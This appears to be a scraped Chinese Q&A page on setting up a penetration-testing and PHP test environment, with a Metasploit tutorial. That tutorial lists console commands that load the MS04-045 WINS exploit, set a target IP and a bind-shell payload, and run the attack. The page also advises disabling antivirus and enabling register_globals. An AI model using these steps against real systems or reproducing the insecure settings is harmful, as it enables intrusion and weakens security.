文章大纲：

• 1、黑客渗透需要搭建虚拟机吗
• 2、如何搭建测试环境？
• 3、救命啊！php环境怎么搭建？如何测试搭建成功？
• 4、如何安装metasploit
• 5、一般黑客进行入侵的是时候需要在虚拟的环境（虚拟机）下吗？

黑客渗透需要搭建虚拟机吗

肯定是需要搭建虚拟机的，搭建渗透环境，本地测试，如果在是实体机上搭建就容易中毒等情况。

如何搭建测试环境？

1、真实：尽量模拟用户的真实使用环境。这里需要提一点，关于项目软件与产品软件需要不同看待。项目软件由于只针对某一群体的用户，所以测试的环境比较单一。但产品软件针对的是广大群众，所以测试环境比较复杂，要多方面考虑。

2、干净：测试环境中尽量不要安装与被测软件无关的软件。笔者就遇到这种事情，两台机器，针对一个功能，一台测试OK，另一台测试NG，最后根据调查发现，测试OK的机器上安装了客户根本不会安装的VC++开发环境，测试NG的机器正因为没有安装VC，所以测试出了这个bug：软件中缺少必要的动态链接库支持。但这个干净也不是必须的，有时还要刻意去测试某个软件去其他软件并存时的兼容性问题。

3、无毒，这个应该不必多说了，测试工作应该确保在无毒的环境中进行。

4、独立：测试环境与开发环境相互独立。就是说开发环境和测试环境更好分开，即测试人员和开发人员分别用不同的服务器（数据库、后台服务器等），避免造成相互干扰。

简单的说就是软件运行的平台，即软件、硬件和 *** 三种环境的合集，也就是说：测试环境=软件+硬件+ ***

硬件：包括PC机、笔记本、服务器、各种终端等。例如要测试photoshop软件，是要在PC机上测，还是笔记本上测？是在cpu为酷睿的计算机上测，还是要在炫龙的cpu上测？不同的硬件环境photoshop的处理速度是不一样的。

软件：这里主要指的是软件运行的操作系统。例如测试photoshop，是指windows xp下测试还是在vista下测试？可能会有兼容性问题。软件环境还包括与其他各类软件共存同一系统时的兼容性问题。

*** ：主要针对的是C/S结构和B/S结构的软件。比如我现在测试的软件，客户的 *** 环境是千兆以太网，而我们的 *** 环境还是百兆以太网，而且还是闲时才能达到百兆的速度。这样的环境要是很精确的测试响应时间，还是很伤脑筋的。

救命啊！php环境怎么搭建？如何测试搭建成功？

想方便的话，装个wampserver,

如果想正规装的话

s/***********************************

*Windows下面的Apache+PHP+Mysql环境搭建

*2010.06

************************************/

一.所需软件

1.Apache服务器(Web服务器)

httpd-2.2.15-win32-x86-no_ssl.msi

官方下载网址：httpd.apache.org

2.PHP引擎(PHP环境)

php-5.3.2-Win32-VC6-x86.zip

官方下载网址：

3.mysql数据库服务器

mysql-5.0.18-win32-Setup.exe

官方下载网址：

4.mysql数据库客户端

SQLyog814.exe

phpMyAdmin-3.3.3-all-languages.zip

二.Apache+PHP基础环境搭建

1.Apache服务器的安装

(1).自己新建一个安装php软件的文件夹(如：D:\php)，

安装httpd-2.2.15-win32-x86-no_ssl.msi

到D:\php\apache2文件夹

(2).配置D:\php\apache2\conf\httpd.conf文件

1查找Listen 80，将端口修改成自己想要的端口，如：8088

2测试：启动服务器，打开浏览器在地址栏输入

，出现"It works"则安装成功

(2)查找DocumentRoot "d:/php/apache2/htdocs"

将路径设置自己做项目开发的根文件夹

如E:/phpweb，同时修改Directory "d:/php/apache2/htdocs"

(3)查找ServerName，去掉#号，修改成ServerName localhost:8088

2.PHP环境

(1)将php-5.3.2-Win32-VC6-x86.zip解压到D:\php\php5根目录

(2)将以下dll文件复制到c:\windows\system32下面

php5ts.dll,php_gd2.dll,php_mysql.dll,php_mbstring.dll

,libmysql.dll

(3)配置D:\php\apache2\conf\httpd.conf文件

1查找DirectoryIndex index.html在后面加上index.htm index.php

2模块化安装配置

找到#LoadModule ssl_module modules/mod_ssl.so这行，后面加入

LoadModule php5_module D:/php/php5/php5apache2_2.dll

3使支持php

找到AddType application/x-gzip .gz .tgz，后面加入

AddType application/x-httpd-php .php

PHPIniDir "D:/php/php5"

4使支持中文，查找AddDefaultCharset，设置成utf8，如果没有则直接在

开头部分加AddDefaultCharset utf8

(4)PHP.ini文件配置

到D:\php\php5文件夹下复制一份php.ini-development

并修改文件名为php.ini，然后打开php.ini修改

1.查找extension_dir = "./"将"./"修改成D:/php/php5/ext

2.查找register_globals，后面加上=On

有些程序需要该项支持，否则无法上传文件

3查找下面3项将前面的分号去掉

extension=php_mbstring.dll

extension=php_gd2.dll

extension=php_mysql.dl

4php时差问题，PHP5系列版本新增了时区设置，默认为格林威治时间，与中国所在的东8区正好相差8个小时

查找date.timezone，修改成date.timezone = PRC

5设置session的临时存放文件夹

在D:\php\php5下新建session_tmp文件夹

在php.ini中查找session.save_path = "/tmp"，将"/tmp"修改成

D:\php\php5\session_tmp

6测试：在E:/phpweb文件夹下面新建一个index.php文件，打开写如下内容

?php echo "欢迎来到php的世界！" ?

在浏览器查看

(5)安装PHP集成开发环境

EclipsePHP Studio 2008 v1.0 Install.exe

三.Mysql的环境搭建

1.服务器和客户端的安装

见视频mysql数据库部分.wrf

2.phpMyAdmin

将phpMyAdmin-3.3.3-all-languages.zip解压到

项目根目录E:\phpweb下，修改文件夹名称为phpmyadmin

在浏览器中输入

即可到达登录页面登录

如何安装metasploit

一、搭建metasploit环境

Windows环境下安装

metasploit

安装时需要注意要关闭杀毒软件，如果安装有杀毒软件，会提示在metasploit的安装目录下检测到病毒或木马。

二、metasploit的使用

Metasploit目前提供了三种用户使用接口，一个是GUI模式，另一个是console模式，第三种是CLI（命令行）模式。原来还提供一种WEB模式，目前已经不再支持。目前这三种模式各有优缺点，建议在MSF console模式中使用。在console中几乎可以使用MSF所提供的所有功能，还可以在console中执行一些其它的外部命令，如ping。

Windows下GUI启动方式，从开始菜单——Metasploit Framework——Metaspliit GUI即可。如下图所示：

其GUI模式启动后界面如图2所示：

Windows下console模式的启动方式与GUI方式类似，启动后界面如图3所示：

Metasploit的使用较为简单，了解其基本命令即可。下面以console的使用方式为例说明如何使用：

输入help或？可查看帮助信息。

下面以exploit中的ms04_045_wins为例进行说明。

1、show exploits，

2、info exploit/windows/wins/ms04_045_wins，查看其描述信息。

3、use exploit/windows/wins/ms04_045_wins，使用此exploit。

4、show options，查看相应的选项

5、set RHOST    192.168.1.200，设置目标

6、set RPORT    7777，设置端口

7、set PAYLOAD generic/shell_bind_tcp，设置使用的shellcode

8、exploit，执行攻击

一般黑客进行入侵的是时候需要在虚拟的环境（虚拟机）下吗？

虚拟机一样会被入侵.

你的意思是当虚拟机系统受到入侵后,断开连接,真实的系统会不会也受到入侵.

一般情况下,真实系统是不会受到入侵的,但有一些高手黑客是可以通过虚拟机进行局域网入侵到你的真实系统.只要你能做好虚拟和真实系统之间的安全防范应该是没有问题的.

即使安全防范问题做的不太完善,一般的"黑客"想要入侵真实系统还是有一定难度的.所以用虚拟机上网,风险会大大降低.